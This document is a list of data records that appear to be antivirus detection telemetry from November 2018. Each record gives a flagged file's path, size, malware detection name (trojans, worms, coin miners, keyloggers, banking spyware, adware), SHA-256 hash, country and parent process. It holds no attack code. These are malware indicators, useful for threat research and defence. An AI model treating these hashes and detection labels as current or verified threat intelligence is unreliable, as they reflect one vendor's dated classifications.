  Row(detection=Row(filename='avscan-20181102-051913-cebc0f74', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051913-CEBC0F74', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055833-4d5a7c8d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055833-4D5A7C8D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054852-f3201ca2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054852-F3201CA2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-171730-baeb5430', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cae6e045\\AVSCAN-20181101-171616-ADA5310B\\AVSCAN-20181101-171730-BAEB5430', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:17:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fav3.exe', filepath='\\\\?\\D:\\Fav3.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T14:37:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-122754-11e51a30', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d280ee4\\AVSCAN-20181101-122741-0F721C34\\AVSCAN-20181101-122754-11E51A30', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='45be2bb7883b7e635f1fcb40fb787f9371fd06d1ef5be60c485f05591cbe178d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:27:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='surat dokter 2017.bat', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2017\\RPG GARMENT 2017\\LPA 2017\\ANALISA SURAT DOKTER 2017\\SURAT DOKTER 2017.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:28:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-024920-9b9b9992', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d265d3ba\\AVSCAN-20181102-024828-93CDD881\\AVSCAN-20181102-024920-9B9B9992', filesize=1536000, name='TR/CoinMiner.BZ.#M1.#R1'), hash='070eb33afc11530df004f70b7d8dd606ab877a41d14e253a01ca5da759365976', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T23:49:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T01:30:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-07-26-19.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-17T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T04:08:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T05:56:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155815-d894884c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155815-D894884C', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:58:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='epsdneul.exe', filepath='D:\\SERVER_BENGKEL\\1.ADMBENG\\EPSON\\Apps\\DownloadNavigator\\EPSDNEUL.EXE', filesize=1232000, name='W32/Sality.AT.#M1.#R1'), hash='378e3c19e7cfcc8a5ea55ba2e8bf7e459b39eb818e4f7beb309c236a4b0c1f59', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:33:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dukenukemmp.exe', filepath='\\?\\J:\\العاب2\\رجل المهمات\\DukeNukemMP.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='0713f22d733572db1a5425aec02945fe66e79042a9f3af903be5ca708bfe654b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:12:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='igfxcfg.exe', filepath='I:\\Driver\\899_drivers\\Intel\\I915GM\\Vga\\Windrv\\Win2000\\igfxcfg.exe', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='1c7bfd93ff5aff1b33c6a9a171f8838efdcba9cd870071487994e01e19bacd0d', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe', parentsize=1378648, timestamp='2018-11-01T12:06:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7465884\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/ads:1 \\\\\\/mnl', country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\Downloads\\helloneighbor_1260572563.exe', parentsize=2367968, timestamp='2018-11-01T20:32:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='start.exe', filepath='\\\\192.168.0.100\\kr-server\\廣羅\\kr-server\\server行政\\0管理部\\行政部\\工商萬用管理表格管理表格\\生產管理類\\start.exe', filesize=1536000, name='W32/Stanit.#M1.#R1'), hash='425632d45efdb7dd22ce3554f0d2cb222a02b0875f26746bcd5550470e73a9da', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:dZLJlmOScUes48KI.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T00:57:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='diagnosticshub.standardcollector.service.exe', filepath='C:\\Windows\\System32\\DiagSvcs\\DiagnosticsHub.StandardCollector.Service.exe', filesize=64000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='0375a8abdd68739293e8746e0bcc449686ed62bb2b114ce363695c4b09e83bfc', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T08:38:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-105854-47711ef1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_735ad0b6\\AVSCAN-20181101-105628-2D312540\\AVSCAN-20181101-105854-47711EF1', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:58:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-161750-fb305fdc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2cd1ddcd\\AVSCAN-20181101-161148-D5525E98\\AVSCAN-20181101-161750-FB305FDC', filesize=1664000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='1e7ebb456d8b1d0cfbb646f0374da6f987bf4c7b141db293d667c65aeabb09c0', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:17:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-224820-f218212a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d2ec22ab\\AVSCAN-20181031-223233-9671A702\\AVSCAN-20181031-224820-F218212A', filesize=128000, name='WORM/Autorun.bggd.#M1.#R1'), hash='3d3934b0c0564b390566e9ecbe66fc38a503499921e7c1b3e9e45558c69888cc', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:46:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwh5d77', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWH5D77', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:42:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='\\\\?\\C:\\Windows\\SysWOW64\\config\\1\\1\\2\\3\\1\\1\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.71.#M1.#R1'), hash='298cbe85ed29c3da3c0911f41b694304300d80e5b7bb00626165260169b0ac87', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T02:08:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-064544-cbb6850a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d787a023\\AVSCAN-20181102-064523-C8E9B94B\\AVSCAN-20181102-064544-CBB6850A', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:45:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-012113-1bc6d4fb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8ee50773\\AVSCAN-20181101-011928-0E61CA2D\\AVSCAN-20181101-012113-1BC6D4FB', filesize=4800000, name='TR/Spy.Banker.Gen.#M1.#R1'), hash='6a10f4e287d21dd6ef83dd4c4fe2a109922634b96f93274f2c2bdbcbd68ebea7', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T03:22:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='microsoft office 2007 full serial __3108_il5153.exe', filepath='C:\\Users\\X\\Downloads\\Microsoft Office 2007 Full Serial __3108_il5153.exe', filesize=696000, name='ADWARE/Amonetize.Gen.#M300.#R6412'), hash='df264ecdbc5c8b21c86dc394ca14fc894c929b64a3bf1044ab777262d605189d', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3231232, timestamp='2018-11-01T06:39:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='n.dll', filepath='\\\\?\\C:\\Program Files (x86)\\Common Files\\SystemMonitor\\n.dll', filesize=9060000, name='PUA/PUA/CPUGuardian.#M1.#R1'), hash='ca7a812237ef6c287bb44e5729273694e0d9108a890fc1f1271589c3d3d335e2', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:28:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-081119-10ab07b8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_620cd239\\AVSCAN-20181101-081057-0D3996A3\\AVSCAN-20181101-081119-10AB07B8', filesize=9344000, name='TR/Dldr.Sinresby.abfvn.#M1.#R1'), hash='9e13fec7ff37d8db304b41a9aa23a67bb6f407a3f94faf6d22c6e815c4080e98', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T00:11:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194940-347e4349', filepath='C:\\Dokumente und Einstellungen\\All Users\\Anwendungsdaten\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-194851-43B8FAA4\\AVSCAN-20181101-194940-347E4349', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='bc7bb743f15d54c4eddda83ae49fbc06ae0e0b0851f35435b24473496fd30668', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:49:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-074705-9dcf998a', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-074618-93F68117\\AVSCAN-20181101-074705-9DCF998A', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline=None, country='BA', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:46:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='leogadget-downloader.exe', filepath='J:\\GWF\\LW-E\\Gwf-2\\Update\\Miniaturanwendungen\\leogadget-Downloader.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='5eb4196ba6cc00f5eec70e214d8c069ce03af20e0364d79642d551531721287a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\totalcmd\\TOTALCMD.EXE', parentsize=1074896, timestamp='2018-11-01T19:39:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='ad8f744b1ae49cd7b5c77d064eb03ffe9af3aca626912557bd59c339e1b1fa4d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T14:10:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-112116-48975078', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-112116-48975078', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:21:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='npsnlcdmabinaryupgrade.exe', filepath='C:\\Program Files\\SAMSUNG\\Samsung New PC Studio\\NPSNLCDMABinaryUpgrade.exe', filesize=1536000, name='W32/Sality.AT.#M1.#R1'), hash='eb00b33108a95bb5da205369914c9a64bcb9fb467d4d221228b93732dce8d988', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Download Manager\\IDMan.exe', parentsize=4130260, timestamp='2018-11-01T13:54:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='_isdel.exe', filepath='D:\\Discos utiles\\BMW6.5\\ENG\\_ISDel.exe', filesize=64000, name='W32/Alman.BB.#M1.#R1'), hash='7dfdae2dce9dc6bc97889f8f83e5d5de35651732b0df6b6ee346c86ed1058b16', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:42:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='c079787fe283ff5c4a987ded1d4d866cf7cb4248a90e87901e8cd246ab08be4c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\C079787FE283FF5C4A987DED1D4D866CF7CB4248A90E87901E8CD246AB08BE4C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='c079787fe283ff5c4a987ded1d4d866cf7cb4248a90e87901e8cd246ab08be4c', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:11:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='faixa 03 lançamento 2015 -=mp3=-.exe', filepath='C:\\Users\\X\\Documents\\Baixar,_Escutar_CD_Sorriso_Maroto_-_Eu_Gosto,_Ao_Vivo_No_Maracanãzinho_-_(2015)[1]\\Baixar, Escutar CD Sorriso Maroto - Eu Gosto, Ao Vivo No Maracanãzinho - (2015)\\FAIXA 03 Lançamento 2015 -=Mp3=-.exe', filesize=4800000, name='TR/Spy.Banker.Gen.#M300.#R2024'), hash='6a10f4e287d21dd6ef83dd4c4fe2a109922634b96f93274f2c2bdbcbd68ebea7', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-01T03:19:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110827-e7927869', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110827-E7927869', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:08:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111242-07acc3a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111242-07ACC3A5', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:12:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-122608-ffd9c7d5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6e841615\\AVSCAN-20181101-122516-F9C8D5E2\\AVSCAN-20181101-122608-FFD9C7D5', filesize=128000, name='TR/Dropper.qoskp.#M1.#R1'), hash='680fa2eadd5464cccda41161a653055390ff65d1c43507fd554ee67ee66e9b0c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:26:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='efd2686de4f23b9009a90073712f2ba26e9a38afa101f33bc120bb4b7d9b3461', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_26.10.2018-1.available\\Avira\\EFD2686DE4F23B9009A90073712F2BA26E9A38AFA101F33BC120BB4B7D9B3461', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='efd2686de4f23b9009a90073712f2ba26e9a38afa101f33bc120bb4b7d9b3461', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T05:50:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='com.estrongs.android.pop.pro.exe', filepath='G:\\Android\\data\\com.estrongs.android.pop.pro.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='e9238eb4cc2a0e45a4ecca77c7477cc3a19b6954cc0ca545537f1325ece125fc', metadata=Row(cmdline=None, country='CI', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2106176, timestamp='2018-11-01T11:54:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-174054-6b0b891f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_998a8064\\AVSCAN-20181101-174035-66B08158\\AVSCAN-20181101-174054-6B0B891F', filesize=2496000, name='TR/Crypt.CFI.Gen.#M300.#R616'), hash='afa0bb04a5f6fd8a1f696508e646b4ff3f97d655537358d74484afcad341106d', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T14:40:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='ae6c89ba33fb3fb7c0ecffcde0ffdc3501b4fe3d405f1d1fef94c6c9b4aa7627', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-01T12:36:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='adobe premiere pro cc 2018 12.0.0.224 x64_ba2e8a34.exe', filepath='C:\\Users\\X\\Desktop\\Adobe Premiere Pro CC 2018 12.0.0.224 x64_ba2e8a34.exe', filesize=294912000, name='HEUR/AGEN.1000587.#M1.#R1'), hash='ad89b75827d2f9c125614f4d7d18aaae981a86dde80d5763cfbeb604a624e869', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T01:15:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='feko_70_calculator.exe', filepath='\\\\?\\D:\\дрова\\Feko 7\\FEKO_70_Calculator.exe', filesize=1152000, name='HEUR/AGEN.1001554.#M1.#R1'), hash='9c3a98ae4d6e9690ae5c1079a4b85b7a6c522027f84748bd8d10ba4c86112918', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T16:19:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bein online.exe', filepath='c:\\users\\X\\appdata\\local\\temp\\rar$exa4736.43339\\bein online.exe', filesize=768000, name='TR/Dldr.Zampol.75e966.#M1.#R1'), hash='75e9662275fd9a5eeb9c632ff17ca43dba27480b6123c70517609ebb6e0d51e1', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=1567448, timestamp='2018-11-01T20:49:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='2097325.exe', filepath='C:\\SGE\\Modulos\\209\\2097325.exe', filesize=1920000, name='TR/Hesv.rfwaf.#M1.#R1'), hash='39f6946c1a066b1cbde5f405ec3c9b9221fdd5c30ca0fb763d6876c803c1f71c', metadata=Row(cmdline='-k localsystemnetworkrestricted -p -s SysMain', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=44520, timestamp='2018-11-01T18:34:52Z'), dt=datetime.date(2018, 11, 1)),
